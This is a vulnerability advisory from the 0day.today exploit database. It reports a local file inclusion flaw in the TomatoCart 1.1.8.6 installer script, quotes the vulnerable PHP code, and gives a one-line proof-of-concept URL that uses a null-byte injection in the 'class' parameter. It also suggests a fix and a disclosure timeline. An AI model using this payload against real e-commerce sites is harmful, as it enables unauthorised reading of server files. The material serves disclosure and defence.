[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TomatoCart 1.1.8.6 Local File Inclusion Vulnerability

Author
TUNISIAN CYBER
Risk
[
Security Risk High
]
0day-ID
0day-ID-21892
Category
web applications
Date add
15-02-2014
Platform
php
[+] Author: TUNISIAN CYBER
[+] Exploit Title: TomatoCart 1.1.8.6 Local File Inclusion Vulnerability
[+] Date: 14-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux
[+] Vendor: http://www.tomatocart.com/
[+] Friendly Sites: na3il.com,th3-creative.com

1.OVERVIEW:
TomatoCart 1.1.8.6 (old versions too) suffers from a LFI Vulnerability.
More Info about LFI:
https://www.netsparker.com/local-file-inclusion/

2.Background:
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. 
It's distributed under the terms of the GNU General Public License (or "GPL"), 
free to download and share. 
The community, including project founders and other developers, 
are supposed to work together on the platform of TomatoCart, contributing features, technical support and services.
http://www.tomatocart.com/about-us/about-tomatocart.html

3.Vulnerability:
File : /install/rpc.php Lines:21--->44
[PHP]
if (isset($_GET['action']) && !empty($_GET['action'])) {
    switch ($_GET['action']) {
      case 'dbCheck':
        $db = array('DB_SERVER' => trim(urldecode($_GET['server'])),
                    'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])),
                    'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])),
                    'DB_DATABASE' => trim(urldecode($_GET['name'])),
                    'DB_DATABASE_CLASS' => trim(urldecode($_GET['class']))
                   );

        $osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']);

        if ($osC_Database->isError() === false) {
          $osC_Database->selectDatabase($db['DB_DATABASE']);
        }

        if ($osC_Database->isError()) {
          echo '[[0|' . $osC_Database->getError() . ']]';
        } else {
          echo '[[1]]';
        }

        exit;
        break;
[PHP]

4.Proof Of Concept:
127.0.0.1/install/rpc.php?action=dbCheck&class=LFI%00

5.Solution(s):
No Patch was released.
Delete "/install/" Folder.
Use another ShoppingApplication.

6.TIME-LINE:
2014-02-13: Vulnerability was discovered.
2014-02-13: Contact with vendor.
2014-02-14: No Reply
2014-02-14: Vulnerability Released

7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members

#  0day.today [2024-09-28]  #